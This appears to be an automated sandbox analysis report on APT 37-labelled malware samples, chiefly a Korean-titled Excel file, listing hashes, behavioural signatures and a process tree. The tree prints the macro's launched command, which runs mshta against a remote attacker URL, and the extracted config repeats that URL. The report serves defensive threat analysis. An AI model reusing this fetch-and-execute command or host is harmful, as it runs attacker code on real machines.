Overview
overview
10Static
static
8APT 37 Pre...01.rar
windows7-x64
3APT 37 Pre...01.rar
windows10-2004-x64
3APT 37 Pre...0).rar
windows7-x64
3APT 37 Pre...0).rar
windows10-2004-x64
3APT 37 Pre...0).xls
windows7-x64
10APT 37 Pre...0).xls
windows10-2004-x64
10APT 37 Pre.../1.rar
windows7-x64
3APT 37 Pre.../1.rar
windows10-2004-x64
3APT 37 Pre...EC.rar
windows7-x64
3APT 37 Pre...EC.rar
windows10-2004-x64
3APT 37 Pre...¦¬.hwp
windows7-x64
3APT 37 Pre...¦¬.hwp
windows10-2004-x64
3APT 37 Pre...°.rar
windows7-x64
3APT 37 Pre...°.rar
windows10-2004-x64
3APT 37 Pre...on.rar
windows7-x64
3APT 37 Pre...on.rar
windows10-2004-x64
3APT 37 Pre...22.rar
windows7-x64
3APT 37 Pre...22.rar
windows10-2004-x64
3APT 37 Pre...27.rar
windows7-x64
3APT 37 Pre...27.rar
windows10-2004-x64
3APT 37 Pre...ce.rar
windows7-x64
3APT 37 Pre...ce.rar
windows10-2004-x64
3APT 37 Pre...06.rar
windows7-x64
3APT 37 Pre...06.rar
windows10-2004-x64
3APT 37 Pre...55.rar
windows7-x64
3APT 37 Pre...55.rar
windows10-2004-x64
3APT 37 Pre...13.rar
windows7-x64
3APT 37 Pre...13.rar
windows10-2004-x64
3APT 37 Pre...SA.rar
windows7-x64
3APT 37 Pre...SA.rar
windows10-2004-x64
3APT 37 Pre...).rar
windows7-x64
3APT 37 Pre...).rar
windows10-2004-x64
3Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 23:12
Behavioral task
behavioral1
Sample
APT 37 Previous Commits 1/(20220120)2022λ μ΄λμ°½ν μ λ μΈμ¬001.rar
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
APT 37 Previous Commits 1/(20220120)2022λ μ΄λμ°½ν μ λ μΈμ¬001.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).rar
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
APT 37 Previous Commits 1/1.rar
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
APT 37 Previous Commits 1/1.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
APT 37 Previous Commits 1/2017-APEC.rar
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
APT 37 Previous Commits 1/2017-APEC.rar
Resource
win10v2004-20230221-en
Behavioral task
behavioral11
Sample
APT 37 Previous Commits 1/2021λ ICTμ΅ν© μ€λ§νΈκ³΅μ₯ κ΅¬μΆ λ° κ³ λν μ¬μ μ΅μ’ κ°λ¦¬.hwp
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
APT 37 Previous Commits 1/2021λ ICTμ΅ν© μ€λ§νΈκ³΅μ₯ κ΅¬μΆ λ° κ³ λν μ¬μ μ΅μ’ κ°λ¦¬.hwp
Resource
win10v2004-20230220-en
Behavioral task
behavioral13
Sample
APT 37 Previous Commits 1/2022 νκΈ° μ -νΈμ μ λͺ¨μ§μκ°.rar
Resource
win7-20230220-en
Behavioral task
behavioral14
Sample
APT 37 Previous Commits 1/2022 νκΈ° μ -νΈμ μ λͺ¨μ§μκ°.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral15
Sample
APT 37 Previous Commits 1/2022-01-27-notification.rar
Resource
win7-20230220-en
Behavioral task
behavioral16
Sample
APT 37 Previous Commits 1/2022-01-27-notification.rar
Resource
win10v2004-20230221-en
Behavioral task
behavioral17
Sample
APT 37 Previous Commits 1/2022-03-22.rar
Resource
win7-20230220-en
Behavioral task
behavioral18
Sample
APT 37 Previous Commits 1/2022-03-22.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral19
Sample
APT 37 Previous Commits 1/2022.04.27.rar
Resource
win7-20230220-en
Behavioral task
behavioral20
Sample
APT 37 Previous Commits 1/2022.04.27.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral21
Sample
APT 37 Previous Commits 1/20220315-112_Notice.rar
Resource
win7-20230220-en
Behavioral task
behavioral22
Sample
APT 37 Previous Commits 1/20220315-112_Notice.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral23
Sample
APT 37 Previous Commits 1/202203_5_06.rar
Resource
win7-20230220-en
Behavioral task
behavioral24
Sample
APT 37 Previous Commits 1/202203_5_06.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral25
Sample
APT 37 Previous Commits 1/20220510_115155.rar
Resource
win7-20230220-en
Behavioral task
behavioral26
Sample
APT 37 Previous Commits 1/20220510_115155.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral27
Sample
APT 37 Previous Commits 1/20220913.rar
Resource
win7-20230220-en
Behavioral task
behavioral28
Sample
APT 37 Previous Commits 1/20220913.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral29
Sample
APT 37 Previous Commits 1/20220916093205755684_TSA.rar
Resource
win7-20230220-en
Behavioral task
behavioral30
Sample
APT 37 Previous Commits 1/20220916093205755684_TSA.rar
Resource
win10v2004-20230221-en
Behavioral task
behavioral31
Sample
APT 37 Previous Commits 1/2022λ κ΅λ°©λΆ λΆμμ΄μ¬ μλ΄(λͺ½κ³¨λ¦¬μ).rar
Resource
win7-20230220-en
Behavioral task
behavioral32
Sample
APT 37 Previous Commits 1/2022λ κ΅λ°©λΆ λΆμμ΄μ¬ μλ΄(λͺ½κ³¨λ¦¬μ).rar
Resource
win10v2004-20230220-en
General
-
Target
APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls
-
Size
135KB
-
MD5
c8df23e698e196f803ace0f50a18944d
-
SHA1
bf47a34bc092fa81918a387e8f5282f7a7d8a0c4
-
SHA256
db70f269d62c43bd09580858731853a589e0f32f2d3c915b15cb9f0b4b9f12d2
-
SHA512
29146eff3ed7d8b6ddbf1736f2e2a2fb90a0cec1fc9f8244763802ef9af36bbf1fdd907eee198fe8d910cd3ae17227ab2d2b9e376d9243bdc549d602182f6ab3
-
SSDEEP
3072:Fk3hOdsylKlgryzc4bNhZFGzE+cL2knAeQN3QgBzMnNXHM6au7Fei9Yyg4/FQbux:Fk3hOdsylKlgryzc4bNhZF+E+W2knAeX
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/6.html
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exeWerFault.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1828 2256 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1272 2256 WerFault.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 44 2184 mshta.exe -
Process spawned suspicious child process 1 IoCs
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
Processes:
DW20.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3772 2256 DW20.EXE EXCEL.EXE -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1272 2256 WerFault.exe EXCEL.EXE -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dwwin.exeEXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dwwin.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dwwin.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
EXCEL.EXEdwwin.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwwin.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2256 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
EXCEL.EXEpid process 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 2256 EXCEL.EXE 2256 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
EXCEL.EXEcmd.exeDW20.EXEdescription pid process target process PID 2256 wrote to memory of 1828 2256 EXCEL.EXE cmd.exe PID 2256 wrote to memory of 1828 2256 EXCEL.EXE cmd.exe PID 1828 wrote to memory of 2184 1828 cmd.exe mshta.exe PID 1828 wrote to memory of 2184 1828 cmd.exe mshta.exe PID 2256 wrote to memory of 3772 2256 EXCEL.EXE DW20.EXE PID 2256 wrote to memory of 3772 2256 EXCEL.EXE DW20.EXE PID 3772 wrote to memory of 2812 3772 DW20.EXE dwwin.exe PID 3772 wrote to memory of 2812 3772 DW20.EXE dwwin.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\APT 37 Previous Commits 1\(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://attiferstudio.com/install.bak/sony/6.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://attiferstudio.com/install.bak/sony/6.html3⤵
- Blocklisted process makes network request
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 42922⤵
- Process spawned suspicious child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dwwin.exeC:\Windows\system32\dwwin.exe -x -s 42923⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2256 -s 30922⤵
- Process spawned unexpected child process
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 2256 -ip 22561⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2256-133-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmpFilesize
64KB
-
memory/2256-134-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmpFilesize
64KB
-
memory/2256-135-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmpFilesize
64KB
-
memory/2256-136-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmpFilesize
64KB
-
memory/2256-137-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmpFilesize
64KB
-
memory/2256-138-0x00007FF9A6360000-0x00007FF9A6370000-memory.dmpFilesize
64KB
-
memory/2256-139-0x00007FF9A6360000-0x00007FF9A6370000-memory.dmpFilesize
64KB
-
memory/3772-165-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmpFilesize
64KB
-
memory/3772-166-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmpFilesize
64KB
-
memory/3772-167-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmpFilesize
64KB
-
memory/3772-168-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmpFilesize
64KB